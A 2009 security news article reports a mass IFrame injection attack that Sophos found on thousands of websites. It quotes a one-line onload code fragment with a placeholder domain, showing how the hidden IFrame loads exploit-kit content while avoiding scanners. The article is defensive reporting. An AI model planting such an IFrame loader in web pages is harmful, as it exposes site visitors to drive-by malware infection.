NEWS CATEGORIES:



NEWS ARCHIVE >>
SOFTPEDIA REVIEWS >>
MEET THE EDITORS >>
Home > News > Security

Security


New Mass Web Injection Attack Spreading

Malicious IFrame uses onload event to generate src

By Lucian Constantin, Web News Editor

26th of October 2009, 14:40 GMT

Adjust text size:


IFrame injection attack uses onload JavaScript event to hide src
Enlarge picture
Security researchers warn that a new injection attack has infected thousands of websites with malicious IFrames. In order to avoid detection, the rogue IFrames get their src attribute through an onload JavaScript event.

The infection was first spotted by malware analysts from antivirus vendor Sophos on the website of music legend Van Morrison. "What I did see was a heavily obfuscated script injected into the page that references an iframe. A quick analysis of the obfuscated script revealed that it adds an iframe to the page to load content from a remote site," Paul O Baccas, virus and spam researcher at SophosLabs reported on October 22nd.

Since then Sophos has added detection for this threat under Mal/Iframe-N. Mr. Baccas announced yesterday that the number of infections with this malicious piece of code had risen to reach several thousands of websites, including some high profile ones.

Aside from the heavy obfuscation, which is a common technique of hiding rogue code on compromised pages, this attack makes use of a specific trick to avoid Web scanners. More specifically, decoding the string will result in an IFrame that doesn't have a direct src value. Instead it uses an onload="if (!this.src) {this.src='http://DOMAIN.TLD'; this.height=N; this.width=N;}" function to generate it.

The src usually points to an exploit kit hosted on third-party servers, which targets vulnerabilities in outdated software and attempts to infect visitors with malware. "All the domains used so far have been based in Russia," the Sophos researcher notes.

The method of injection has not been determined yet, but regardless of how it's done, the malicious IFrame is inserted at the end of the page after the </html> element. In a recent similar attack, compromised FTP credentials have been used to infect the websites, but automated tools exploiting cross-site scripting or SQL injection weaknesses are likely candidates too.

Web exploitation has been a common method of malware distribution, suggesting that the technique is successful enough for cybercriminals to invest their resources into these attacks. Studies have shown that this is largely because users fail to install critical patches for popular software such as Adobe Reader, Flash Player, Java Runtime Environment, Microsoft Office or Windows itself.

TAGS:

iframe injection | website compromise | exploit kit | Mal/Iframe-N | Van Morrison
Read by 1,782 user(s) | Add comment | Link to this article TWEET THIS


Article rating:
Excellent (5.0/5) 1 vote(s)    

Subscribe to news | Print article | Send to friend

© Copyright 2001-2010 Softpedia
Contact:

 

 

SEARCH THE NEWS ARCHIVE :




Today's News
| Yesterday's News | News Archive


MORE RELATED ARTICLES:


Gumblar Returns with Revamped Version

Over 62,000 New URLs Serving Exploit Cocktail

Infected Website Hosting 56,371 Threats

Nine-Ball Distributes Complex Click Fraud Trojan

Web Malware Employs New Obfuscation Technique

FTP Credentials for Major Websites Compromised

Nine-Ball Mass Injection Attack Makes over 40,000 Victims

Gumblar Morphs, Becomes Martuz

User opinions:

No user comments yet.
Be the first to express your opinion using the form below!

Share your opinion:

Your Name:
Your Email Address:
(will not be used for commercial purposes)
Solve this to prove you're not a bot: =
Your review/opinion:

 




Windows tabGames tabDrivers tabMac tabLinux tabScripts tabMobile tabHandheld tabGadgets tabNews tab

SUBMIT PROGRAM   |   ADVERTISE   |   GET HELP   |   SEND US FEEDBACK   |   RSS FEEDS   |   ENTER NEWS SITE   |   ENGLISH BOARD   |   ROMANIAN FORUM